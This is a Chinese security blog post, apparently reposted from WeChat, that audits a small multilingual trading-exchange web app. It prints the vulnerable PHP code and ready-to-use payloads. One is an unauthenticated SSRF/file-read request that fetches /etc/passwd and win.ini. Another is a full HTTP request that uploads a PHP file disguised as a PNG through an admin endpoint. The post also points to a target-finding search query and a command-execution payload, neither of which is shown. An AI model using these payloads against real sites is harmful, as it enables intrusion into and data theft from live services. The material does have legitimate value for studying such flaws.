0x00 前言
某小型交易所
Fofa语句:请见文末!
0x01 前台任意文件读取+SSRF漏洞
publicfunctioncurlfun($url, $params = array(), $method ='GET'){$header =array();$opts =array(CURLOPT_TIMEOUT =>10, CURLOPT_RETURNTRANSFER =>1, CURLOPT_SSL_VERIFYPEER =>false, CURLOPT_SSL_VERIFYHOST =>false, CURLOPT_HTTPHEADER => $header);/* 根据请求类型设置特定参数 */switch(strtoupper($method)) {case'GET':$opts[CURLOPT_URL] = $url .'?'. http_build_query($params);$opts[CURLOPT_URL] = substr($opts[CURLOPT_URL],0,-1);break;case'POST'://判断是否传输文件$params = http_build_query($params);$opts[CURLOPT_URL] = $url;$opts[CURLOPT_POST] =1;$opts[CURLOPT_POSTFIELDS] = $params;break;default:}/* 初始化并执行curl请求 */$ch = curl_init();curl_setopt_array($ch, $opts);$data = curl_exec($ch);$error = curl_error($ch);curl_close($ch);if($error) {$data =null;}return$data;}
Payload:
/index/api/curlfun?url=file:///C:/windows/win.ini/index/api/curlfun?url=file:///etc/passwd
Linux:
Windows:
可以读取数据库文件查看是否外联等操作,绝对路径随便地址栏打个错误的控制器就能看到,这套tp程序开了Debug的
0x02 后台任意文件上传漏洞
需要代理用户或管理员权限,然后访问 /lxcgdja/login/login.html 登录
在 /application/lxcgdja/controller/Lc.php 控制器中,upimg方法存在file()原生上传函数,并且直接将上传的文件地址返回,导致漏洞产生.
publicfunctionupimg(){$file = request()->file('file');// 移动到框架应用根目录/public/uploads/ 目录下if($file){$info = $file->move(ROOT_PATH .'public'. DS .'uploads');if($info){// 成功上传后 获取上传信息// 输出 jpg//echo $info->getExtension();// 输出 20160820/42a79759f284b767dfcb2a0197904287.jpg//echo $info->getSaveName();//echo "/public/uploads/".$info->getSaveName();$host=$_SERVER['HTTP_HOST'];//3$res=["code"=>200,"type"=>"ok","message"=>$_SERVER['HTTP_ORIGIN']."/public/uploads/".$info->getSaveName()];returnjson($res);// 输出 42a79759f284b767dfcb2a0197904287.jpg//echo $info->getFilename();}else{// 上传失败获取错误信息echo$file->getError();}}}
Payload:
POST/lxcgdja/lc/upimgHTTP/1.1Host: 127.0.0.1Content-Length: 266Cache-Control: max-age=0sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7kIBHhzmRDBL1vqUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=2c3kq6821qjrpr9h6ifp3e5gi8Connection: close------WebKitFormBoundaryj7kIBHhzmRDBL1vqContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/png图片数据phpinfo();------WebKitFormBoundaryj7kIBHhzmRDBL1vq--
0x03 前台任意命令执行漏洞
Payload:
请见文末!
原文始发于微信公众号(星悦安全):某四国语言微盘交易所审计
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论